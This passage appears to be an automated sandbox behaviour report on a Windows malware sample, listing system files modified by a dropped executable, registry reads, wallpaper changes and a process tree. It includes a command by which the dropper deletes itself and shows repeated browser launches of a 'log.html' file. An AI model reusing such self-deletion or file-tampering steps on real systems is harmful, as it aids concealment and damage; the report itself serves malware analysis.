| File opened for modification | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\FileExplorerExtensions\Assets\images\contrast-standard\theme-light\windows.recyclebin.empty.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-u..monotificationuxexe_31bf3856ad364e35_10.0.22000.282_none_618940d4a376d501\RestartTonight_80_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\r\webapps\guidedsetup\network\area-content\kn-IN\area-content.local.json | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-t..torserver.resources_31bf3856ad364e35_10.0.22000.1_en-us_10b767ef1f47f334.manifest | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Images\security_watermark.jpg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-l..ume-coren.resources_31bf3856ad364e35_10.0.22000.493_en-us_0300e1106fa1c9f2\f\license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\js\localAccount.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\Assets\SquareTile71x71.scale-100.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\contrast-white\GetStartedLargeTile.scale-400_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Cortana.UI\Assets\Icons\AppListIcon.targetsize-80.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\retailDemoShared.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-onecore-ras-base-vpn_31bf3856ad364e35_10.0.22000.1_none_72a0f22ae2efe1c9\@VpnToastIcon.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\Cortana.UI\Assets\Icons\SmallTile.scale-400.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\Assets\Splashscreen.scale-100.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\js\oobeautopilotactivation-vm.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\PrintDialog\Assets\splashscreen.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorAppList.targetsize-36_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorWideTile.scale-400.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.22000.469_none_160103e31c4d8d88\logo.targetsize-60.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.22000.120_none_bb415867ae85d51c\CssUtilities.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_systemresource-wind..-ui-accountscontrol_31bf3856ad364e35_10.0.22000.1_none_28587f5d588ad881\Generic.Theme-Light_Scale-400.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\Cortana.UI\Assets\dismiss.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\n\FileExplorerExtensions\Assets\images\contrast-standard\theme-light\windows.searchclosetab.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\activity-sync-consent.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_dd24c7cd1fc6d4b1\PeopleLogo.targetsize-16_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.22000.120_none_f759261c81fa2ed8\Square44x44Logo.contrast-black_scale-100.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\r\Public\wsxpacks\Account\assets\__\lib-localization\dist\resources\az-Latn-AZ.json | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\wow64_microsoft.powershel..resources.resources_31bf3856ad364e35_10.0.22000.1_it-it_6f0ece72b17b880a\MSFT_ServiceResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\contrast-black\AppListIcon.targetsize-256_altform-unplated.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\oobelanguage-vm.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-ui-shell-component_31bf3856ad364e35_10.0.22000.1_none_a3e51f070f511641\RequestedDownloadsCloudIcon.contrast-white_scale-150.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-standard\theme-light\windows.newfolder.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\Manifests\amd64_system.runtime.serialization.json_b03f5f7f11d50a3a_4.0.15806.0_none_f74ad672311b8041.manifest | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\wow64_microsoft-windows-mccs-syncutil_31bf3856ad364e35_10.0.22000.1_none_271f7818dc552a47\LiveDomainList.txt | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\diagnostics\system\Power\fr-FR\RS_Balanced.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\css\oobe-light.css | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\Public\wsxpacks\Account\assets\__\lib-localization\dist\resources\sr-Latn-RS.json | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\Cortana.UI\Assets\Icons\AppListIcon.scale-100.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\memoryAnalyzer\images\status_heap_increase.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.22000.120_none_bb415867ae85d51c\MessageOverlayControl.css | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\f\resources.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\localNgc.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-standard\theme-dark\windows.unpinfromstartscreen.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..iagnostic.resources_31bf3856ad364e35_10.0.22000.120_ru-ru_70626ad0aa00edcc\f\RS_Balanced.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Ratings\RatingStars42.contrast-white_scale-200.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-t..honyinteractiveuser_31bf3856ad364e35_10.0.22000.1_none_1e7f12b35c10d87a\TextReply.scale-150.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\wow64_microsoft.powershell.dsc.resources_31bf3856ad364e35_10.0.22000.1_de-de_7bb95fa12dc9f6c5\PSDesiredStateConfiguration.Resource.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\Cursors\link.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\diagnostics\system\IEBrowseWeb\es-ES\RS_RestoreIEconnection.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-k..iagnostic.resources_31bf3856ad364e35_10.0.22000.1_es-es_1e98d7dbbca7bad2\CL_LocalizationData.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.22000.120_none_bb415867ae85d51c\serviceworkericon.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe
"C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe"
C:\Users\Admin\AppData\Roaming\ysljjud.exe
C:\Users\Admin\AppData\Roaming\ysljjud.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3372C1~1.EXE >> NUL
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3904 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
